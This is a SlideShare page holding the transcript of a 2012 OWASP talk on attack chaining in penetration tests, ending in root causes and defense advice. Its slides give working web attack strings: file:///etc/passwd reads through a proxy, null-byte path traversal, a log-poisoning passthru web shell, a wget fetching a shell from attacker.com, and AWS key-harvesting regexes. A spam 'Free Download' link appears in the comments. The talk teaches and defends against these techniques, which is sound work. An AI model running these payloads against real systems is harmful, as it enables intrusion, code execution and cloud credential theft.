Your SlideShare is downloading. ×
Attack Chaining: Advanced Maneuvers for Hack Fu
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Attack Chaining: Advanced Maneuvers for Hack Fu

3,230
views

Published on

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a …

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

Published in: Technology, Design

1 Comment
3 Likes
Statistics
Notes
  • Free Download : http://gg.gg/114bb
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total Views
3,230
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
100
Comments
1
Likes
3
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Attack ChainingAdvanced Maneuvers for Hack FuOWASP ATL31 May 2012
  • 2. About Us WHO ARE THES DUDES? •  Rob •  Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2  
  • 3. Penetration Test vs.Vulnerability Assessment 3  
  • 4. vs. 4  
  • 5. Simulate a real worldattack against atarget network orapplication. - EVERYBODY 5  
  • 6. It answers thequestion, “couldsomeone break in?” 6  
  • 7. Penetration Testing Exploit & Penetrate InformationGathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
  • 8. Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple sites •  Out-sourced PHP development to many contractors •  Determine attackers ability to compromise PII or infrastructure 8  
  • 9. Step 1 – Explore 9  
  • 10. Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10  
  • 11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11  
  • 12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12  
  • 13. Attack Chaining – Maneuver 1 13  
  • 14. Attack Chaining – Maneuver 1 14  
  • 15. Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15  
  • 16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16  
  • 17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com  DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 17  
  • 18. Step 7 – Back to DirBuster 18  
  • 19. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19  
  • 20. Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php?phprequire_once(includes/config.php);$module = !empty($_REQUEST[module]) ? $_REQUEST[module] :$config[module];$action = !empty($_REQUEST[action]) ? $_REQUEST[action] :$config[action];$currentModuleFile = modules/.$module./.$action..php;include($currentModuleFile)exit;? 20  
  • 21. Attack Chaining – Maneuver 2 21  
  • 22. Attack Chaining – Maneuver 2 22  
  • 23. Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23  
  • 24. Step 8 – Review Codehttp://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php?phprequire_once(includes/config.php);$module = !empty($_REQUEST[module]) ? $_REQUEST[module] :$config[module];$action = !empty($_REQUEST[action]) ? $_REQUEST[action] :$config[action];$currentModuleFile = modules/.$module./.$action..php;include($currentModuleFile)exit;? 24  
  • 25. Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25  
  • 26. Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf VirtualHost * ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log /VirtualHost 26  
  • 27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27  
  • 28. Step 12 – Poison Logs 28  
  • 29. Step 12 – Poison Logs 29  
  • 30. Step 12 – Poison Logs ? echo pre; passthru($_GET[cmd]); echo /pre; ? 30  
  • 31. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31  
  • 32. Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: ? echo pre;passthru( $_GET[cmd]);echo pre; ? 32  
  • 33. Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33  
  • 34. Step 14 – Execute Code ? echo pre; passthru(ls); echo /pre; ? /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34  
  • 35. Attack Chaining – Maneuver 3 35  
  • 36. Attack Chaining – Maneuver 3 36  
  • 37. Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00cmd=wget%20http:// attacker.com/gny.php;   37  
  • 38. Step 16 – Enjoy! 38  
  • 39. Step 17 – I  want  more!ec2[^d][][A-Z0-9]{20}[]ec2.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]ec2.*[][A-Z0-9]{20}[]ec2(D)*[][A-Z0-9]{20}[]amazon.*[][A-Z0-9]{20}[](amazon|ec2).*[][A-Z0-9]{20}[]amazon(D)*[][A-Z0-9]{20}[]access secret [][A-Z0-9]{20}[] [A-Za-z0-9+/]{40}amazon.*[][A-Z0-9]{20}[].*[][A-Za-z0-9+/]{40}[]aws.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]amazon.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]secret.*[][A-Za-z0-9+/]{40}[][][A-Za-z0-9+/]{40}[].*amazon 39  
  • 40. Step 18 – Amazon  AWS  Regex$this-­‐amazonService  =  new  Zend_Service_Amazon(DB3BAD768F2F11C7628,    $aws_key  =  8AFB5AF55D1E6620EE1;    define(AMAZON_KEY,  372B8E408D1484C538F);    if  (!defined(awsAccessKey))  define(awsAccessKey,  9F6EB7471C926194884);    //if  (!defined(awsAccessKey))  define(awsAccessKey,  4CAD89B86344CD8C26C);    define(AMAZON_AES_ACCESS_KEY_ID,  95C95B8DC84AA24C0EC);   40  
  • 41. Step 19 – AWS  Takeover 41  
  • 42. Step 20 – Make  It  Your  Own 42  
  • 43. Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker launches 100 Extra Large Clusters$1,049,000 43  
  • 44. Take Them Off The Web CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker shuts down and deletes all servers and backups permanentlyPRICELESS 44  
  • 45. Attack Chaining – Hack Fu 45  
  • 46. Attack Chaining – Hack Fu 46  
  • 47. Why Is This Happening? 1.  Local File Include 4.  Insecure Credential •  File Read Only Storage •  Code Execution 5.  Overly Permissive 2.  Null Byte Injection Amazon AWS Keys 3.  Log Poisoning 6.  Sensitive Information Disclosure 47  
  • 48. Web à Mass Malware Deployment 48  
  • 49. Web à Data Center Compromise 49  
  • 50. Web à Internal Network Compromise 50  
  • 51. Internal Assessmentà SSN Bank #’s 51  
  • 52. Infrastructure Review 52  
  • 53. Step 1 – Target Wireless 53  
  • 54. Step 1 – Target Wireless 54  
  • 55. Step 2 – Port Scan 55  
  • 56. Step 3 – Test Default Creds 56  
  • 57. Infrastructure Apocalypse 57  
  • 58. Step 4 – Control AP 58  
  • 59. Step 5 – Read All E-mail 59  
  • 60. Step 6 – Listen To VOIP 60  
  • 61. Step 7 – Open All Doors 61  
  • 62. Step 7 – Open All Doors 62  
  • 63. 63  
  • 64. Step 7 – Server Room Door 64  
  • 65. Is This Real Life? 1.  Insecure Wireless 4.  Weak Passwords Encryption 5.  Sensitive Information 2.  Improper Network Disclosure Segmentation 3.  Insecure Default Configuration 65  
  • 66. Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical Security 5.  Defense In-Depth 66  
  • 67. Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67  
  • 68. How Do You Get Better? 68  
  • 69. Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69  
  • 70. Attack Visualization LIKE BOBBY FISCHER 70  
  • 71. Thank You 72  

×